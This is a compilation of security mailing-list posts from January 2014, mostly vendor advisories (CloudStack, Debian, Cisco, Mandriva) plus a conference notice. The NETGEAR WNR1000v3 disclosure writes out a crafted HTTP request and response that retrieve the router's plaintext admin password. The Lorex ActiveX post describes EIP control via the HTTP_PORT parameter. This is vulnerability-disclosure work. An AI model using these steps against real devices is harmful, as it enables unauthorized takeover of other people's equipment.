Updated [CVE-2014-0031] CloudStack ListNetworkACL API discloses ACLs for other users
Issued: January 9, 2014 Updated: January 10, 2014 [CVE-2014-0031] CloudStack ListNetworkACL API discloses ACLs for other users Product: Apache CloudStack Vendor: Apache Software Foundation Vulnerability type: Information Disclosure Vulnerable Versions: Apache CloudStack 4.2.0 CVE References: CVE-2014-0031 Risk Level: Low CVSSv2 Base Scores: 3.5 (AV:N/AC:M/Au:S/C:P/I:N/A:N) Description: The Apache CloudStack Security Team was notified of a an issue in Apache CloudStack which permits an authenticated user to list network ACLs for other users. Mitigation: Upgrading to CloudStack 4.2.1 or higher will mitigate this issue. References: https://issues.apache.org/jira/browse/CLOUDSTACK-5145 Credit: This issue was identified by Marcus Sorensen
Updated [CVE-2013-6398] CloudStack Virtual Router stop/start modifies firewall rules allowing additional access
Issued: November 27, 2013 Updated: January 10, 2014 [CVE-2013-6398] CloudStack Virtual Router stop/start modifies firewall rules allowing additional access Product: Apache CloudStack Vendor: Apache Software Foundation Vulnerability type: Bypass Vulnerable Versions: Apache CloudStack 4.1.0, 4.1.1, 4.2.0 CVE References: CVE-2013-2136 Risk Level: Low CVSSv2 Base Scores: 2.8 (AV:N/AC:M/Au:M/C:P/I:N/A:N) Description: The Apache CloudStack Security Team was notified of a an issue in the Apache CloudStack virtual router that failed to preserve source restrictions in firewall rules after a virtual router had been stopped and restarted. Mitigation: Upgrading to CloudStack 4.2.1 or higher will mitigate this issue. References: https://issues.apache.org/jira/browse/CLOUDSTACK-5263 Credit: This issue was identified by the Cloud team and Schuberg Philis
[SECURITY] [DSA 2840-1] srtp security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2840-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso January 10, 2014 http://www.debian.org/security/faq - - Package: srtp Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2013-2139 Debian Bug : 711163 Fernando Russ from Groundworks Technologies reported a buffer overflow flaw in srtp, Cisco's reference implementation of the Secure Real-time Transport Protocol (SRTP), in how the crypto_policy_set_from_profile_for_rtp() function applies cryptographic profiles to an srtp_policy. A remote attacker could exploit this vulnerability to crash an application linked against libsrtp, resulting in a denial of service. For the oldstable distribution (squeeze), this problem has been fixed in version 1.4.4~dfsg-6+deb6u1. For the stable distribution (wheezy), this problem has been fixed in version 1.4.4+20100615~dfsg-2+deb7u1. For the testing distribution (jessie), this problem has been fixed in version 1.4.5~20130609~dfsg-1. For the unstable distribution (sid), this problem has been fixed in version 1.4.5~20130609~dfsg-1. We recommend that you upgrade your srtp packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJS0DBmAAoJEAVMuPMTQ89EDZoP+wX3KQU/9dnk67ngLC9c9asr /i/zUaerW5rDG/pQkf94VAER+qac0TMZXN17bZzEvoui02lYU/kcSqNrmWx02J1C +nzi3X8+BwcZcZnUYbpv4681iJDKOOcEsM8pNvQjavhiNHF78wL1QNstbMbv/HHT EB8Q+eP4EJOmYwnHthOeT8yeDMQMlpsGtdXShvJe/LphtFBZn9WqPNnvoQiI0kVo b2yWLtS+7UdeWSEgChoKnBx7pUVR/Eyyl9ncuHA3qNc1wWrIWAGVIanqHN5GJl07 KTwYn+dPrln/YabbhZASwU7Re8tSARN/mFbvT74xqjJ91EgTyHY82N0G0XAo0wxb XCnOfN9oWsO1Fr6W1VnQyJ795wLxlAm02TT7gj/So17WM9MK6Xy5Fx7a/PwUwz8T EqoB6xuZLdlVzGc8GeDL80sBhZ4VGgrjC7dxhTMfyU7tDCvrxaHeuDtAbGrEZIb8 VTVPyN/vB3kCCEyRWWoY2q6GWH21iRNGLhKRoqb4zsMebwFBsfWYaGiL5sGyATzD YmgT5Q0HfoTboQBfHSzZRHDNWFBVUOfY64Ut8QSiE7hFySjxrNqxctNt1OQEZZGZ juMCd5GrXRnfkIPS/iIHoNWcg5YCjc1pEI/MbeSSQXA75zJI/HVOKJUSm6uTQ7Ar xumHO0//mQ8zM/zWYSSG =6Cvs -END PGP SIGNATURE-
[CVE -2014-1201] Lorex security DVR ActiveX control buffer overflow
Hi, I have discovered a buffer overflow vulnerability that allows remote code execution in an ActiveX control bundled by a manufacturer of video surveillance systems. The company is Lorex Technologies, a major video surveillance manufacturer that is very popular in the US and East Asia. Their affected product range is the EDGE series, which has 16 products in it. I have confirmed that all 16 are vulnerable at this point in time. These security DVR's are remotely accessible, and when you access it on a Windows computer with Internet Explorer, they try to install the vulnerable ActiveX control INetViewX. The Lorex manual[1] instructs the user to blindly accept the ActiveX control install when prompted. The full list of devices, as well as links to the firware download, can be found in [2]. Their products offer remote video viewing capabilities, and you can find some of them on Shodan[3]. The buffer overflow can be triggered by a really long string (1+ characters) in the HTTP_PORT parameter. The instruction pointer can be very easily controlled in XP by the characters 109 to 113 in the string. Please refer to the PoC file lorex-testcase.html. You will see that the HTTP_PORT parameter is composed of D's, apart from chars 109 to 113 which are four A's. If you open this file in IE after installing the control, you will see that IE will crash with an EIP of 0x41414141. Changing the four A's to any other value will cause EIP to crash on that value. The list below tells a better story about what is affected and how it can be controlled: Win XP SP3 with IE6 - Fully exploitable as described Win XP SP3 with IE8 - Could not get it to crash () Win 7 x64 with IE10 fully patched - Fully exploitable, though not as easy as for XP (see analyze -v [4] and !exploitable [5] outputs) To verify this vulnerability you can download and extract the firmware using binwalk (http://code.google.com/p/binwalk/). To do so, please follow the instructions in [6], and then install the ActiveX control in INetViewProj1_02030330.cab. I have contacted Lorex and they initially said they would fix it, but went radio silent shortly afterwards. 17.11.2013 - Initial contact via support page 18.11.2013 - Email to sales, no response. 21.11.2013 - Second email to sales, received response by sales saying they will forward it to technical support and get back to me. 04.12.2013 - Third email to sales saying that technical support never contacted me back. No response. 08.01.2013 - MITRE assigns CVE-2014-1201 to this issue. 09.01.2013 - Public disclosure. All references and proof of concept can be under the lorexActivex folder in the repo at https://github.com/pedrib/PoC Regards, Pedro Ribeiro (ped...@gmail.com) Agile Information Security
Cisco Security Advisory: Undocumented Test Interface in Cisco Small Business Devices
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Undocumented Test Interface in Cisco Small Business Devices Advisory ID: cisco-sa-20140110-sbd Revision 1.0 For Public Release 2014 January 10 16:00 UTC (GMT) +- Summary === A vulnerability in the Cisco WAP4410N Wireless-N Access Point, Cisco WRVS4400N Wireless-N Gigabit Security Router, and the Cisco RVS4000 4-port Gigabit Security Router could allow an unauthenticated, remote attacker to gain root-level access to an affected device. Cisco will release free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are not available. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140110-sbd -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iF4EAREIAAYFAlLQN78ACgkQUddfH3/BbTqu+wD/eWfAdt6H8ltKyHE4DT8SkTPM j08MEAnhmkmuHjXSuwEA/0VbbYIOr1mqoOJEUbF3aFw7Veacwgk555uevEeC1/9b =V3bU -END PGP SIGNATURE-
[SECURITY] [DSA 2841-1] movabletype-opensource security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2841-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff January 11, 2014 http://www.debian.org/security/faq - - Package: movabletype-opensource Vulnerability : cross-site scripting Problem type : remote Debian-specific: no CVE ID : CVE-2014-0977 Debian Bug : 734304 A cross-site scripting vulnerability was discovered in the rich text editor of the Movable Type blogging engine. For the oldstable distribution (squeeze), this problem has been fixed in version 4.3.8+dfsg-0+squeeze4. For the stable distribution (wheezy), this problem has been fixed in version 5.1.4+dfsg-4+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 5.2.9+dfsg-1. We recommend that you upgrade your movabletype-opensource packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAlLRifgACgkQXm3vHE4uylrqQwCgs7od6yQXHC55MagOjjx+HNhC nQkAoJH9jVxEbne55TIYoCHXEN5hMMQT =DItV -END PGP SIGNATURE-
CISTI'2014: List of Workshops
** WORKSHOPS *** CISTI'2014 - 9th Iberian Conference on Information Systems and Technologies Barcelona, Spain, June 18 - 21, 2014 http://www.aisti.eu/cisti2014/index.php/en/workshops List of Workshops to be held in the CISTI'2014 context: - ARWC 2014 - 1st Workshop on Augmented Reality and Wearable Computing - ASDACS 2014 - 1st Workshop on Applied Statistics and Data Analysis using Computer Science - IoT 2014 - 1st Workshop on Internet of Things - SGaMePlay 2014 - 4th Iberian Workshop on Serious Games and Meaningful Play - TICAMES 2014 - 2nd Workshop on Information and Communication Technology in Higher Education: Learning Mathematics - WICTA 2014 - 1st Workshop on ICT for Audit - WISA 2014 - 6th Workshop on Intelligent Systems and Apllications - WLA 2014 - 1st Workshop on Learning Analytics - WNIS 2014 - 1st Workshop on Networks, Information and Society Detailed information about these workshops is available at http://www.aisti.eu/cisti2014/index.php/en/workshops Best regards, CISTI'2014 Team http://www.aisti.eu/cisti2014/index.php/en
NETGEAR WNR1000v3 Password Recovery Vulnerability
Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery vulnerability. Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and subsequently gain full access to the device. This vulnerabilty can be exploited remotely if the remote administration access feature is enabled (as well as locally via wired or wireless access). Tested Device Model: Netgear N150 WNR1000v3 Tested Device Firmware Versions: V1.0.2.60_60.0.86, V1.0.2.54_60.0.82NA, and V1.0.2.62_60.0.87 Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for guest and private network) firewall rule and port forwarding manipulation, etc. Vulnerabilty Status: Vulnerability was privately disclosed to the vendor in June of 2013, however they have not yet issued a patch. Other Notes: This vulnerability remains exploitable when the password recovery feature of the router is disabled. Overview: The password recovery mechanism appears to be designed to work as follows: 1.) After failing to login the user will be redirected to a password recovery page that requests the router serial number 2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 2 secret questions 3.) If the user answers the secret questions correctly, the router username and password is displayed The problem: The implementation of this password recovery method has issues...lots of issues Vulnerability and Exploit Details: 1.) Access the router login through a web browser: http://192.168.1.1 2.) Select Cancel on the HTTP basic login box (or enter arbitrary credentials), the router responds with the following (Note the unauth.cgi?id parameter): -- HTTP/1.0 401 Unauthorized WWW-Authenticate: Basic realm=NETGEAR WNR1000v3 Content-type: text/html html head meta http-equiv='Content-Type' content='text/html; charset=utf-8' title401 Unauthorized/title/head body onload=document.aForm.submit()h1401 Unauthorized/h1 pAccess to this resource is denied, your client has not supplied the correct authentication./pform method=post action=unauth.cgi?id=78185530 name=aForm/form/body /html -- 3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request: - POST http://192.168.1.1/passwordrecovered.cgi?id=78185530 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Host: 192.168.1.1 Content-Length: 35 Connection: Keep-Alive Pragma: no-cache -- The username and (plaintext) password are returned in the response (truncated for brevity): -- .. tr td class=MNUText align=rightRouter Admin Username/td td class=MNUText align=leftadmin/td /tr tr td class=MNUText align=rightRouter Admin Password/td td class=MNUText align=leftD0n'tGuessMe!/td /tr .. -- Additional details and proof-of-concept exploit can be found here: http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html
[ MDVSA-2014:001 ] kernel
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:001 http://www.mandriva.com/en/support/security/ ___ Package : kernel Date: January 13, 2014 Affected: Business Server 1.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in the Linux kernel: The KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges or cause a denial of service (system crash) via a VAPIC synchronization operation involving a page-end address (CVE-2013-6368). The apic_get_tmcct function in arch/x86/kvm/lapic.c in the KVM subsystem in the Linux kernel through 3.12.5 allows guest OS users to cause a denial of service (divide-by-zero error and host OS crash) via crafted modifications of the TMICT value (CVE-2013-6367). Multiple buffer underflows in the XFS implementation in the Linux kernel through 3.12.1 allow local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the CAP_SYS_ADMIN capability for a (1) XFS_IOC_ATTRLIST_BY_HANDLE or (2) XFS_IOC_ATTRLIST_BY_HANDLE_32 ioctl call with a crafted length value, related to the xfs_attrlist_by_handle function in fs/xfs/xfs_ioctl.c and the xfs_compat_attrlist_by_handle function in fs/xfs/xfs_ioctl32.c (CVE-2013-6382). Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges via a large id value (CVE-2013-4587). The mISDN_sock_recvmsg function in drivers/isdn/mISDN/socket.c in the Linux kernel before 3.12.4 does not ensure that a certain length value is consistent with the size of an associated data structure, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7266). The atalk_recvmsg function in net/appletalk/ddp.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7267). The ipx_recvmsg function in net/ipx/af_ipx.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7268). The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7269). The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7270). The x25_recvmsg function in net/x25/af_x25.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7271). The Linux kernel before 3.12.4 updates certain length values before ensuring that associated data structures have been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call, related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c, net/ipv6/raw.c, and net/ipv6/udp.c (CVE-2013-7263). The l2tp_ip_recvmsg function in net/l2tp/l2tp_ip.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7264). The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call
[SECURITY] [DSA 2842-1] libspring-java security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2842-1 secur...@debian.org http://www.debian.org/security/ Markus Koschany January 13, 2014 http://www.debian.org/security/faq - - Package: libspring-java Vulnerability : denial of service Problem type : remote Debian-specific: no CVE ID : CVE-2013-4152 Debian Bug : 720902 Alvaro Munoz discovered a XML External Entity (XXE) injection in the Spring Framework which can be used for conducting CSRF and DoS attacks on other sites. The Spring OXM wrapper did not expose any property for disabling entity resolution when using the JAXB unmarshaller. There are four possible source implementations passed to the unmarshaller: DOMSource StAXSource SAXSource StreamSource For a DOMSource, the XML has already been parsed by user code and that code is responsible for protecting against XXE. For a StAXSource, the XMLStreamReader has already been created by user code and that code is responsible for protecting against XXE. For SAXSource and StreamSource instances, Spring processed external entities by default thereby creating this vulnerability. The issue was resolved by disabling external entity processing by default and adding an option to enable it for those users that need to use this feature when processing XML from a trusted source. It was also identified that Spring MVC processed user provided XML with JAXB in combination with a StAX XMLInputFactory without disabling external entity resolution. External entity resolution has been disabled in this case. For the stable distribution (wheezy), this problem has been fixed in version 3.0.6.RELEASE-6+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 3.0.6.RELEASE-10. We recommend that you upgrade your libspring-java packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAlLUDqMACgkQXm3vHE4uylqISQCfXnqq9kcJ+GXQLanlPAX1zDex GK0An0Re0aPbcNQPadcnJvqE8FY39Mgy =I7B1 -END PGP SIGNATURE-
